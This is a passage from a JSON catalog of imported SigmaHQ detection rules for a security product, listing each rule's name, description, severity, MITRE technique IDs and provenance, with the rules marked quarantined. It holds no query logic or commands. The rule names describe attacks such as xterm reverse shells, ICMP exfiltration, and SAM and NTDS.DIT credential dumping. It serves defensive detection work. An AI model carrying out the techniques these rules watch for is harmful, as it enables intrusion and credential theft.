"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-access-via-trolleyexpress-exclusion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml" } }, { "id": "sigmahq-sigma-4c21b805-4dd7-469f-b47d-7383a8fcb437", "type": "detection", "name": "Potential Iviewers.DLL Sideloading", "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-iviewers-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_iviewers.yml" } }, { "id": "sigmahq-sigma-4c4af3cd-2115-479c-8193-6b8bfce9001c", "type": "detection", "name": "PowerShell ICMP Exfiltration", "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-icmp-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" } }, { "id": "sigmahq-sigma-4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "type": "detection", "name": "System Network Connections Discovery - Linux", "description": "Detects usage of system utilities to discover system network connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-connections-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" } }, { "id": "sigmahq-sigma-4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" } }, { "id": "sigmahq-sigma-4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", "type": "detection", "name": "Antivirus Ransomware Detection", "description": "Detects a highly relevant Antivirus alert that reports ransomware.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-ransomware-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_ransomware.yml" } }, { "id": "sigmahq-sigma-4c7f49ee-2638-43bb-b85b-ce676c30b260", "type": "detection", "name": "Assembly DLL Creation Via AspNetCompiler", "description": "Detects the creation of new DLL assembly files by \"aspnet_compiler.exe\", which could be a sign of \"aspnet_compiler\" abuse to proxy execution through a build provider.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/assembly-dll-creation-via-aspnetcompiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4c7f49ee-2638-43bb-b85b-ce676c30b260", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml" } }, { "id": "sigmahq-sigma-4cad6c64-d6df-42d6-8dae-eb78defdc415", "type": "detection", "name": "Potential Linux Process Code Injection Via DD Utility", "description": "Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-linux-process-code-injection-via-dd-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cad6c64-d6df-42d6-8dae-eb78defdc415", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml" } }, { "id": "sigmahq-sigma-4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "type": "detection", "name": "System Shutdown/Reboot - Linux", "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-shutdown-reboot-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_system_shutdown_reboot.yml" } }, { "id": "sigmahq-sigma-4cbd4f12-2e22-43e3-882f-bff3247ffb78", "type": "detection", "name": "PowerShell Get Clipboard", "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-clipboard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" } }, { "id": "sigmahq-sigma-4cbef972-f347-4170-b62a-8253f6168e6d", "type": "detection", "name": "UAC Bypass Using IDiagnostic Profile", "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-idiagnostic-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4cbef972-f347-4170-b62a-8253f6168e6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" } }, { "id": "sigmahq-sigma-4d0083b3-580b-40da-9bba-626c19fe4033", "type": "detection", "name": "HackTool - CoercedPotato Named Pipe Creation", "description": "Detects the pattern of a pipe name as used by the hack tool CoercedPotato", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-coercedpotato-named-pipe-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d0083b3-580b-40da-9bba-626c19fe4033", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml" } }, { "id": "sigmahq-sigma-4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "type": "detection", "name": "DNS Query To Remote Access Software Domain From Non-Browser App", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-remote-access-software-domain-from-non-browser-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml" } }, { "id": "sigmahq-sigma-4d0af518-828e-4a04-a751-a7d03f3046ad", "type": "detection", "name": "Potential OGNL Injection Exploitation In JVM Based Application", "description": "Detects potential OGNL Injection exploitation, which may lead to RCE.\nOGNL is an expression language that is supported in many JVM based systems.\nOGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ognl-injection-exploitation-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d0af518-828e-4a04-a751-a7d03f3046ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_ognl_injection_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-4d136857-6a1a-432a-82fc-5dd497ee5e7c", "type": "detection", "name": "Sign-ins by Unknown Devices", "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-ins-by-unknown-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml" } }, { "id": "sigmahq-sigma-4d431012-2ab5-4db7-a84e-b29809da2172", "type": "detection", "name": "Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback", "description": "Detects enabling of the \"AllowAnonymousCallback\" registry value, which allows a remote connection between computers that do not have a trust relationship.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-remote-connection-between-anonymous-computer-allowanonymouscallback.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d431012-2ab5-4db7-a84e-b29809da2172", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml" } }, { "id": "sigmahq-sigma-4d78a000-ab52-4564-88a5-7ab5242b20c7", "type": "detection", "name": "Change to Authentication Method", "description": "Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-to-authentication-method.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d78a000-ab52-4564-88a5-7ab5242b20c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml" } }, { "id": "sigmahq-sigma-4d7cda18-1b12-4e52-b45c-d28653210df8", "type": "detection", "name": "Sysmon Driver Unloaded Via Fltmc.EXE", "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685", "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-driver-unloaded-via-fltmc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml" } }, { "id": "sigmahq-sigma-4d7f1827-1637-4def-8d8a-fd254f9454df", "type": "detection", "name": "Sysmon Application Crashed", "description": "Detects application popup reporting a failure of the Sysmon service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-application-crashed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d7f1827-1637-4def-8d8a-fd254f9454df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml" } }, { "id": "sigmahq-sigma-4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", "type": "detection", "name": "Google Cloud Storage Buckets Modified or Deleted", "description": "Detects when storage bucket is modified or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-storage-buckets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-4db60cc0-36fb-42b7-9b58-a5b53019fb74", "type": "detection", "name": "AWS CloudTrail Important Change", "description": "Detects disabling, deleting and updating of a Trail", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-cloudtrail-important-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml" } }, { "id": "sigmahq-sigma-4e25af4b-246d-44ea-8563-e42aacab006b", "type": "detection", "name": "Potential Xterm Reverse Shell", "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-xterm-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e25af4b-246d-44ea-8563-e42aacab006b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml" } }, { "id": "sigmahq-sigma-4e2ed651-1906-4a59-a78a-18220fca1b22", "type": "detection", "name": "PUA - NirCmd Execution", "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nircmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e2ed651-1906-4a59-a78a-18220fca1b22", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" } }, { "id": "sigmahq-sigma-4e7050dd-e548-483f-b7d6-527ab4fa784d", "type": "detection", "name": "NTDS.DIT Creation By Uncommon Parent Process", "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-dit-creation-by-uncommon-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml" } }, { "id": "sigmahq-sigma-4e762605-34a8-406d-b72e-c1a089313320", "type": "detection", "name": "Potential Fake Instance Of Hxtsr.EXE Executed", "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-fake-instance-of-hxtsr-exe-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e762605-34a8-406d-b72e-c1a089313320", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml" } }, { "id": "sigmahq-sigma-4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "type": "detection", "name": "Potential SAM Database Dump", "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sam-database-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sam_dump.yml" } }, { "id": "sigmahq-sigma-4ebc877f-4612-45cb-b3a5-8e3834db36c9", "type": "detection", "name": "Webshell Hacking Activity Patterns", "description": "Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1018", "T1033", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-hacking-activity-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" } }, { "id": "sigmahq-sigma-4eddc365-79b4-43ff-a9d7-99422dc34b93", "type": "detection", "name": "Use of Remote.exe", "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-remote-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" } }, { "id": "sigmahq-sigma-4ede543c-e098-43d9-a28f-dd784a13132f", "type": "detection", "name": "WinRAR Execution in Non-Standard Folder", "description": "Detects a suspicious WinRAR execution in a folder which is not the default installation folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrar-execution-in-non-standard-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ede543c-e098-43d9-a28f-dd784a13132f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml" } }, { "id": "sigmahq-sigma-4edf51e1-cb83-4e1a-bc39-800e396068e3", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - Security", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" } }, { "id": "sigmahq-sigma-4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "type": "detection", "name": "Potential PendingFileRenameOperations Tampering", "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-pendingfilerenameoperations-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 